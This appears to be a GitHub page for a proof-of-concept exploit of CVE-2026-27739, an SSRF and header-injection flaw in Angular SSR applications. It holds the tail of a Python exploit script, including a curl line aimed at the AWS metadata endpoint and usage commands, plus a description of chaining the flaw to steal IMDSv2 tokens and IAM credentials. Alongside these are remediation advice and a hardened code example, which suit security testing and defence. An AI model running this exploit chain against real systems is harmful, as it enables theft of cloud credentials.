mr-redoo7/CVE-2026-27739-POC
GitHub: mr-redoo7/CVE-2026-27739-POC
This tool provides a proof of concept for CVE-2026-27739 in Angular SSR applications, used to detect request-header injection, SSRF and cloud-metadata theft risks caused by prototype pollution.
Stars: 0 | Forks: 0
# -CVE-2026-27739-poc
Tail of `angular_ssr_exploit.py` as published on the page (the `AngularSSRExploit` class and the beginning of the report template are not included here):

```python
curl -H "X-Forwarded-For: http://169.254.169.254/latest/meta-data/" {self.target}
### 2. Header Injection via Prototype Pollution (CVSS: 7.5)
**描述**: Angular SSR 处理不安全的查询参数,影响原型链
**影响**: 请求头篡改,潜在的 SSRF 组合利用
## 修复建议
1. 移除/禁用 X-Forwarded-* 头部处理或将已知代理加入白名单
2. 在进行易受 SSRF 攻击的操作之前实施严格的 URL 验证
3. 使用 `express-validator` 或类似工具进行头部清理
4. 禁用 AWS/GCP 元数据端点,或使用带有跳数限制的 IMDSv2
"""
        print(report)
        with open("angular_ssr_exploit_report.txt", "w") as f:
            f.write(report)


def main():
    parser = argparse.ArgumentParser(description="Angular SSR SSRF & Header Injection Exploit")
    parser.add_argument("target", help="Target Angular SSR application URL")
    parser.add_argument("--no-ssl-verify", action="store_true", help="Disable SSL verification")

    args = parser.parse_args()
    exploit = AngularSSRExploit(args.target, ssl_verify=not args.no_ssl_verify)
    print(f"[+] Targeting: {args.target}")
    print(f"[+] SSL Verify: {'Disabled' if args.no_ssl_verify else 'Enabled'}")

    # Execute exploit chain
    exploit.test_header_injection()
    exploit.exploit_ssrf_chain()
    exploit.extract_sensitive_data()
    exploit.generate_report()


if __name__ == "__main__":
    main()
```
## Usage

```bash
# Basic SSRF test
python3 angular_ssr_exploit.py https://target.com

# With SSL bypass for self-signed certs
python3 angular_ssr_exploit.py https://target.com --no-ssl-verify
```
## How It Works

- **Header Injection Test**: Sends prototype pollution payloads and unsafe forwarded headers that Angular SSR might process insecurely
- **SSRF Chain**: Tests access to AWS IMDS, GCP metadata and localhost services via X-Forwarded-For/X-Original-URL
- **IMDSv2 Token Extraction**: Chains SSRF to steal AWS metadata tokens, then IAM credentials
- **Automated Reporting**: Generates a CVSS-scored pentest report with PoCs
## Technical Details

**Root Cause**: Angular Universal SSR apps often forward `req.headers` directly to internal APIs without sanitization:

```javascript
// Vulnerable Angular SSR pattern
app.get('*', (req, res) => {
  const url = req.headers['x-original-url'] || req.originalUrl; // SSRF: client-controlled URL
  internalFetch(url, { headers: req.headers }); // Header injection: client headers forwarded verbatim
});
```
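Hardened counterpart of the pattern above, written as an added example (not code from this repository or from Angular): the upstream URL is built from the request path and pinned to an assumed placeholder origin `https://api.internal.example`, and only an allow-list of headers is forwarded; `internalFetch` remains the page's own undefined name.

```javascript
// Added example, not the repository's code: hardened form of the route above.
// INTERNAL_API_ORIGIN is an assumed placeholder for the real internal API.
const INTERNAL_API_ORIGIN = 'https://api.internal.example';

// Only these headers go upstream; x-original-url, x-forwarded-*, cookie, etc. are dropped.
const FORWARD_HEADER_ALLOWLIST = new Set([
  'accept', 'accept-language', 'content-type', 'authorization',
]);

// Upstream URL comes from the request path only, never from headers. An absolute
// or protocol-relative path changes the origin after resolution and is rejected.
function buildInternalUrl(originalUrl) {
  const u = new URL(originalUrl, INTERNAL_API_ORIGIN);
  if (u.origin !== INTERNAL_API_ORIGIN) {
    throw new Error('refusing to fetch outside the internal API origin');
  }
  return u.toString();
}

// Copy allow-listed headers only. Object.entries() yields own properties, so keys
// planted on Object.prototype are not forwarded; CR/LF values are dropped (header splitting).
function sanitizeForwardHeaders(reqHeaders) {
  const out = {};
  for (const [name, value] of Object.entries(reqHeaders)) {
    const key = name.toLowerCase();
    if (!FORWARD_HEADER_ALLOWLIST.has(key)) continue;
    const v = Array.isArray(value) ? value.join(', ') : String(value);
    if (/[\r\n]/.test(v)) continue;
    out[key] = v;
  }
  return out;
}

// Hardened route body: pass the result to internalFetch(url, { headers }).
function prepareInternalRequest(req) {
  return {
    url: buildInternalUrl(req.originalUrl),
    headers: sanitizeForwardHeaders(req.headers),
  };
}

// Constructed sample request (not a real capture) exercising both checks.
console.log(prepareInternalRequest({
  originalUrl: '/api/items?id=1',
  headers: { accept: 'application/json', 'x-original-url': 'http://attacker.example/',
             'x-forwarded-for': '10.0.0.1', 'accept-language': 'en\r\nx-injected: 1' },
}));
```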
Tags: Angular SSR, AWS IMDS, CISA project, CVE-2026-27739, EXP, GCP metadata, header injection, IMDSv2, PoC, Python, SSRF, X-Forwarded-For, metadata theft, prototype pollution, security vulnerability, real-time processing, no backdoor, brute force, server-side request forgery, cybersecurity, reverse-engineering tool, privacy protection